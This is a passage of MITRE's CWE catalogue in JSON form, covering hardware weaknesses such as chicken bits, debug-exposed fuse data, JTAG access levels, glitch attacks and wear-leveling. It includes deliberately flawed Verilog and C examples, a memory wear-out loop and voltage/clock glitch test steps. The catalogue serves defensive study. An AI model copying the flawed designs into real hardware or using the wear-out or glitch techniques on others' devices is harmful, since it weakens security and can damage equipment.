Maintenance_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"1242":{"attr":{"@_ID":"1242","@_Name":"Inclusion of Undocumented Features or Chicken Bits","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The device includes chicken bits or undocumented features that can create entry points for unauthorized actors.","Extended_Description":{"xhtml:p":"A common design practice is to use undocumented bits on a device that can be used to disable certain functional security features. These bits are commonly referred to as \\"chicken bits\\". They can facilitate quick identification and isolation of faulty components, features that negatively affect performance, or features that do not provide the required controllability for debug and test. Another way to achieve this is through implementation of undocumented features. An attacker might exploit these interfaces for unauthorized access."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Documentation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"The implementation of chicken bits in a released product is highly discouraged. If implemented at all, ensure that they are disabled in production devices. All interfaces to a device should be documented."},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider a device that comes with various security measures, such as secure boot. The secure-boot process performs firmware-integrity verification at boot time, and this code is stored in a separate SPI-flash device. However, this code contains undocumented \\"special access features\\" intended to be used only for performing failure analysis and intended to only be unlocked by the device designer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":"Attackers dump the code from the device and then perform reverse engineering to analyze the code. The undocumented, special-access features are identified, and attackers can activate them by sending specific commands via UART before secure-boot phase completes. Using these hidden features, attackers can perform reads and writes to memory via the UART interface. At runtime, the attackers can also execute arbitrary code and dump the entire memory contents."},"Body_Text":"Remove all chicken bits and hidden features that are exposed to attackers. Add authorization schemes that rely on cryptographic primitives to access any features that the manufacturer does not want to expose. Clearly document all interfaces."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"212"}},{"attr":{"@_CAPEC_ID":"36"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1071"}},{"attr":{"@_External_Reference_ID":"REF-1072"}},{"attr":{"@_External_Reference_ID":"REF-1073"}},{"attr":{"@_External_Reference_ID":"REF-1074"}},{"attr":{"@_External_Reference_ID":"REF-1075"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-13"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, Related_Attack_Patterns"}}},"1243":{"attr":{"@_ID":"1243","@_Name":"Sensitive Non-Volatile Information Not Protected During Debug","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Access to security-sensitive information stored in fuses is not limited during debug.","Extended_Description":{"xhtml:p":"Several security-sensitive values are programmed into fuses to be used during early-boot flows or later at runtime. Examples of these security-sensitive values include root keys, encryption keys, manufacturing-specific information, chip-manufacturer-specific information, and original-equipment-manufacturer (OEM) data. After the chip is powered on, these values are sensed from fuses and stored in temporary locations such as registers and local memories. These locations are typically access-control protected from untrusted agents capable of accessing them. Even to trusted agents, only read-access is provided. However, these locations are not blocked during debug operations, allowing a user to access this sensitive information."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1263","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Modify Memory","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"Disable access to security-sensitive information stored in fuses directly and also reflected from  temporary storage locations when in debug mode."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Sensitive manufacturing data (such as die information) are stored in fuses. When the chip powers on, these values are read from the fuses and stored in microarchitectural registers. These registers are only given read access to trusted software running on the core. Untrusted software running on the core is not allowed to access these registers.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":"All microarchitectural registers in this chip can be accessed through the debug interface. As a result, even an untrusted debugger can access this data and retrieve sensitive manufacturing data."},{"attr":{"@_Nature":"informative"},"xhtml:div":"Registers used to store sensitive values read from fuses should be blocked during debug. These registers should be disconnected from the debug interface."}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"116"}},{"attr":{"@_CAPEC_ID":"545"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Exposure of Security-Sensitive Fuse Values During Debug","attr":{"@_Date":"2020-08-20"}}}},"1244":{"attr":{"@_ID":"1244","@_Name":"Internal Asset Exposed to Unsafe Debug Access Level or State","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product uses physical debug or test\\n        interfaces with support for multiple access levels, but it\\n        assigns the wrong debug access level to an internal asset,\\n        providing unintended access to the asset from untrusted debug\\n        agents.","Extended_Description":{"xhtml:p":["Debug authorization can have multiple levels of\\n\\t  access, defined such that different system internal assets\\n\\t  are accessible based on the current authorized debug\\n\\t  level. Other than debugger authentication (e.g., using\\n\\t  passwords or challenges), the authorization can also be\\n\\t  based on the system state or boot stage. For example, full\\n\\t  system debug access might only be allowed early in boot\\n\\t  after a system reset to ensure that previous session data is\\n\\t  not accessible to the authenticated debugger.","If this protection mechanism does not ensure that\\n          internal assets have the correct debug access level during\\n          each boot stage or change in system state, an attacker could\\n          obtain sensitive information from the internal asset using a\\n          debugger."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Integrity","Impact":"Modify Memory"},{"Scope":["Authorization","Access Control"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}]},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Check 2 devices for their passcode to authenticate access to JTAG/debugging ports. If the passcodes are missing or the same, update the design to fix and retest. Check communications over JTAG/debugging ports for encryption. If the communications are not encrypted, fix the design and retest.","Effectiveness":"Moderate"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"For security-sensitive assets accessible over debug/test interfaces, only allow trusted agents."},"Effectiveness":"High"},{"Phase":"Architecture and Design","Description":"Apply blinding [REF-1219] or masking techniques in strategic areas.","Effectiveness":"Limited"},{"Phase":"Implementation","Description":"Add shielding or tamper-resistant protections to the device, which increases the difficulty and cost for accessing debug/test interfaces.","Effectiveness":"Limited"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The JTAG interface is used to perform debugging and provide CPU core access for developers. JTAG-access protection is implemented as part of the JTAG_SHIELD bit in the hw_digctl_ctrl register. This register has no default value at power up and is set only after the system boots from ROM and control is transferred to the user software.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:table":{"xhtml:tbody":{"xhtml:tr":[{"xhtml:td":["1 bit","0x0 = JTAG debugger is enabled (default)"]},{"xhtml:td":["JTAG_SHIELD","0x1 = JTAG debugger is disabled"]}]}}},{"attr":{"@_Nature":"informative"},"xhtml:div":"The default value of this register bit should be set to 1 to prevent the JTAG from being enabled at system reset."}],"Body_Text":"This means that since the end user has access to JTAG at system reset and during ROM code execution before control is transferred to user software, a JTAG user can modify the boot flow and subsequently disclose all CPU information, including data-encryption keys."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-18827","Description":"After ROM code execution, JTAG access is disabled. But before the ROM code is executed, JTAG access is possible, allowing a user full system access.  This allows a user to modify the boot flow and successfully bypass the secure-boot process.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18827"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"114"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1056"}},{"attr":{"@_External_Reference_ID":"REF-1057"}},{"attr":{"@_External_Reference_ID":"REF-1219"}}]},"Notes":{"Note":{"#text":"CWE-1191 and CWE-1244 both involve physical debug access,\\n\\t  but the weaknesses are different. CWE-1191 is effectively\\n\\t  about missing authorization for a debug interface,\\n\\t  i.e. JTAG.  CWE-1244 is about providing internal assets with\\n\\t  the wrong debug access level, exposing the asset to\\n\\t  untrusted debug agents.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Name, Observed_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"clarified differences between CWE-1191 and CWE-1244, and suggested rephrasing of descriptions and names."},"Previous_Entry_Name":{"#text":"Improper Authorization on Physical Debug and Test Interfaces","attr":{"@_Date":"2020-08-20"}}}},"1245":{"attr":{"@_ID":"1245","@_Name":"Improper Finite State Machines (FSMs) in Hardware Logic","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Faulty finite state machines (FSMs) in the hardware logic allow an attacker to put the system in an undefined state, to cause a denial of service (DoS) or gain privileges on the victim\'s system.","Extended_Description":{"xhtml:p":"The functionality and security of the system heavily depend on the implementation of FSMs. FSMs can be used to indicate the current security state of the system. Lots of secure data operations and data transfers rely on the state reported by the FSM. Faulty FSM designs that do not account for all states, either through undefined states (left as don\'t cares) or through incorrect implementation, might lead an attacker to drive the system into an unstable state from which the system cannot recover without a reset, thus causing a DoS. Depending on what the FSM is used for, an attacker might also gain additional privileges to launch further attacks and compromise the security guarantees."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Access Control"],"Impact":["Unexpected State","DoS: Crash, Exit, or Restart","DoS: Instability","Gain Privileges or Assume Identity"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Define all possible states and handle all unused states through default statements. Ensure that system defaults to a secure state.","Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The FSM shown in the \\"bad\\" code snippet below assigns the output out based on the value of state, which is determined based on the user provided input, user_input.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"module fsm_1(out, user_input, clk, rst_n);input [2:0] user_input;input clk, rst_n;output reg [2:0] out;reg [1:0] state;always @ (posedge clk or negedge rst_n )endmodule","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"beginendout &lt;= {1\'h1, state};","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"if (!rst_n)state = 3\'h0;elsecase (user_input)endcase","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"3\'h0:3\'h1:3\'h2:3\'h3: state = 2\'h3;3\'h4: state = 2\'h2;3\'h5: state = 2\'h1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}}}}},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:div":{"#text":"case (user_input)endcase","xhtml:br":["",""],"xhtml:div":{"#text":"3\'h0:3\'h1:3\'h2:3\'h3: state = 2\'h3;3\'h4: state = 2\'h2;3\'h5: state = 2\'h1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""],"xhtml:b":"default: state = 2\'h0;"}}}],"Body_Text":{"xhtml:p":["The case statement does not handle the scenario when user provides inputs of 3\'h6 and 3\'h7 using a default statement.  Those inputs push the system to an undefined state and might cause a crash (denial of service) or any other unanticipated outcome.","Adding a default statement to handle undefined inputs mitigates this issue.  This is shown in the \\"Good\\" code snippet below.  The default statement is in bold."]}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"74"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1060"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"The Intel Corporation","Submission_Date":"2020-02-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1246":{"attr":{"@_ID":"1246","@_Name":"Improper Write Handling in Limited-write Non-Volatile Memories","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not implement or incorrectly implements wear leveling operations in limited-write non-volatile memories.","Extended_Description":{"xhtml:p":"Non-volatile memories such as NAND Flash, EEPROM, etc. have individually erasable segments, each of which can be put through a limited number of program/erase or write cycles. For example, the device can only endure a limited number of writes, after which the device becomes unreliable. In order to wear out the cells in a uniform manner, non-volatile memory and storage products based on the above-mentioned technologies implement a technique called wear leveling. Once a set threshold is reached, wear leveling maps writes of a logical block to a different physical block. This prevents a single physical block from prematurely failing due to a high concentration of writes. If wear leveling is improperly implemented, attackers may be able to programmatically cause the storage to become unreliable within a much shorter time than would normally be expected."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Storage IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Instability"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":"Include secure wear leveling algorithms and ensure they may not be bypassed.","Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"An attacker can render a memory line unusable by repeatedly causing a write to the memory line.","Body_Text":["Below is example code from [REF-1058] that the user can execute repeatedly to cause line failure. W is the maximum associativity of any cache in the system; S is the size of the largest cache in the system.","Without wear leveling, the above attack will be successful. Simple randomization of blocks will not suffice as instead of the original physical block, the randomized physical block will be worn out."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":{"#text":"Do aligned alloc of (W+1) arrays each of size S}","xhtml:br":"","xhtml:div":{"#text":"while(1) {","xhtml:br":"","xhtml:div":{"#text":"for (ii = 0; i &lt; W + 1; ii++)","xhtml:div":{"#text":"array[ii].element[0]++;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}},{"attr":{"@_Nature":"informative"},"xhtml:div":"Wear leveling must be used to even out writes to the device."}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"212"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1058"}},{"attr":{"@_External_Reference_ID":"REF-1059"}}]},"Notes":{"Note":{"#text":"The Technology-Class should be Memory.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Potential_Mitigations, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1247":{"attr":{"@_ID":"1247","@_Name":"Improper Protection Against Voltage and Clock Glitches","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The device does not contain or contains incorrectly implemented circuitry or sensors to detect and mitigate voltage and clock glitches and protect sensitive information or software contained on the device.","Extended_Description":{"xhtml:p":"A device might support features such as secure boot which are supplemented with hardware and firmware support. This involves establishing a chain of trust, starting with an immutable root of trust by checking the signature of the next stage (culminating with the OS and runtime software) against a golden value before transferring control. The intermediate stages typically set up the system in a secure state by configuring several access control settings. Similarly, security logic for exercising a debug or testing interface may be implemented in hardware, firmware, or both. A device needs to guard against fault attacks such as voltage glitches and clock glitches that an attacker may employ in an attempt to compromise the system."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Power Management IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Clock/Counter IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Sensor IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Read Memory","Modify Memory","Execute Unauthorized Code or Commands"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":{"xhtml:p":["Put the processor in an infinite\\n\\t\\t\\tloop, which is then followed by instructions\\n\\t\\t\\tthat should not ever be executed, since the\\n\\t\\t\\tloop is not expected to exit.  After the loop,\\n\\t\\t\\ttoggle an I/O bit (for oscilloscope monitoring\\n\\t\\t\\tpurposes), print a console message, and\\n\\t\\t\\treenter the loop.  Note that to ensure that\\n\\t\\t\\tthe loop exit is actually captured, many NOP\\n\\t\\t\\tinstructions should be coded after the loop\\n\\t\\t\\tbranch instruction and before the I/O bit\\n\\t\\t\\ttoggle and the print statement.","Margining the clock consists of varying the clock\\n\\t\\t\\tfrequency until an anomaly occurs. This could be a\\n\\t\\t\\tcontinuous frequency change or it could be a single\\n\\t\\t\\tcycle. The single cycle method is described here. For\\n\\t\\t\\tevery 1000th clock pulse, the clock cycle is shortened by\\n\\t\\t\\t10 percent. If no effect is observed, the width is\\n\\t\\t\\tshortened by 20%. This process is continued in 10%\\n\\t\\t\\tincrements up to and including 50%. Note that the cycle\\n\\t\\t\\ttime may be increased as well, down to seconds per\\n\\t\\t\\tcycle.","Separately, the voltage is margined. Note that\\n\\t\\t\\tthe voltage could be increased or decreased. Increasing\\n\\t\\t\\tthe voltage has limits, as the circuitry may not be able\\n\\t\\t\\tto withstand a drastically increased voltage. This process\\n\\t\\t\\tstarts with a 5% reduction of the DC supply to the CPU\\n\\t\\t\\tchip for 5 millisecond repeated at 1KHz. If this has no\\n\\t\\t\\teffect, the process is repeated, but a 10% reduction is\\n\\t\\t\\tused. This process is repeated at 10% increments down to a\\n\\t\\t\\t50% reduction. If no effects are observed at 5\\n\\t\\t\\tmillisecond, the whole process is repeated using a 10\\n\\t\\t\\tmillisecond pulse. If no effects are observed, the process\\n\\t\\t\\tis repeated in 10 millisecond increments out to 100\\n\\t\\t\\tmillisecond pulses.","While these are suggested starting points for\\n\\t\\t\\ttesting circuitry for weaknesses, the limits may need to\\n\\t\\t\\tbe pushed further at the risk of device damage. See\\n\\t\\t\\t[REF-1217] for descriptions of Smart Card attacks against\\n\\t\\t\\ta clock (section 14.6.2) and using a voltage glitch\\n\\t\\t\\t(section 15.5.3)."]},"Effectiveness":"Moderate"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"During the implementation phase where actual hardware is available, specialized hardware tools and apparatus such as ChipWhisperer may be used to check if the platform is indeed susceptible to voltage and clock glitching attacks."},{"Method":"Architecture or Design Review","Description":"Review if the protections against glitching merely transfer the attack target. For example, suppose a critical authentication routine that an attacker would want to bypass is given the protection of modifying certain artifacts from within that specific routine (so that if the routine is bypassed, one can examine the artifacts and figure out that an attack must have happened). However, if the attacker has the ability to bypass the critical authentication routine, they might also have the ability to bypass the other protection routine that checks the artifacts. Basically, depending on these kind of protections is akin to resorting to \\"Security by Obscurity\\"."},{"Method":"Architecture or Design Review","Description":"Many SoCs come equipped with a built-in Dynamic Voltage and Frequency Scaling (DVFS) that can control the voltage and clocks via software alone. However, there have been demonstrated attacks (like Plundervolt and CLKSCREW) that target this DVFS [REF-1081] [REF-1082]. During the design and implementation phases, one needs to check if the interface to this power management feature is available from unprivileged SW (CWE-1256), which would make the attack very easy."}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"At the circuit-level, using Tunable Replica Circuits (TRCs) or special flip-flops such as Razor flip-flops helps mitigate glitch attacks. Working at the SoC or platform base, level sensors may be implemented to detect glitches. Implementing redundancy in security-sensitive code (e.g., where checks are performed)also can help with mitigation of glitch attacks."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Below is a representative snippet of C code that is part of the secure-boot flow. A signature of the runtime-firmware image is calculated and compared against a golden value. If the signatures match, the bootloader loads runtime firmware. If there is no match, an error halt occurs. If the underlying hardware executing this code does not contain any circuitry or sensors to detect voltage or clock glitches, an attacker might launch a fault-injection attack right when the signature check is happening (at the location marked with the comment), causing a bypass of the signature-checking process.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:p":["...","if (signature_matches)  // &lt;-Glitch Here","{",{"#text":"load_runtime_firmware();","attr":{"@_style":"text-indent: 15px;"}},"}","else","{",{"#text":"do_not_load_runtime_firmware();","attr":{"@_style":"text-indent: 15px;"}},"}","..."],"xhtml:br":["",""]},{"attr":{"@_Nature":"informative"},"xhtml:div":"If the underlying hardware detects a voltage or clock glitch, the information can be used to prevent the glitch from being successful."}],"Body_Text":"After bypassing secure boot, an attacker can gain access to system assets to which the attacker should not have access."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-17391","Description":"Lack of anti-glitch protections allows an attacker to launch a physical attack to bypass the secure boot and read protected eFuses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17391"}},"Functional_Areas":{"Functional_Area":["Power","Clock"]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1061"}},{"attr":{"@_External_Reference_ID":"REF-1062"}},{"attr":{"@_External_Reference_ID":"REF-1063"}},{"attr":{"@_External_Reference_ID":"REF-1064"}},{"attr":{"@_External_Reference_ID":"REF-1065"}},{"attr":{"@_External_Reference_ID":"REF-1066"}},{"attr":{"@_External_Reference_ID":"REF-1217","@_Section":"14.6.2 Security Evolution, page 291"}},{"attr":{"@_External_Reference_ID":"REF-1217","@_Section":"15.5.3 Glitching, page 317"}},{"attr":{"@_External_Reference_ID":"REF-1081"}},{"attr":{"@_External_Reference_ID":"REF-1082"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Functional_Areas"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Parbati K. Manna","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-18","Contribution_Comment":"provided detection methods"},"Previous_Entry_Name":{"#text":"Missing Protection Against Voltage and Clock Glitches","attr":{"@_Date":"2020-08-20"}}}},"1248":{"attr":{"@_ID":"1248","@_Name":"Semiconductor Defects in Hardware Logic with Security-Sensitive Implications","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The security-sensitive hardware module contains semiconductor defects.","Extended_Description":{"xhtml:p":"A semiconductor device can fail for various reasons. While some are manufacturing and packaging defects, the rest are due to prolonged use or usage under extreme conditions. Some mechanisms that lead to semiconductor defects include encapsulation failure, die-attach failure, wire-bond failure, bulk-silicon defects, oxide-layer faults, aluminum-metal faults (including electromigration, corrosion of aluminum, etc.), and thermal/electrical stress. These defects manifest as faults on chip-internal signals or registers, have the effect of inputs, outputs, or intermediate signals being always 0 or always 1, and do not switch as expected. If such faults occur in security-sensitive hardware modules, security guarantees offered by the device will be compromised."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Manufacturing","Note":"May be introduced due to issues in the manufacturing environment or improper handling of components, for 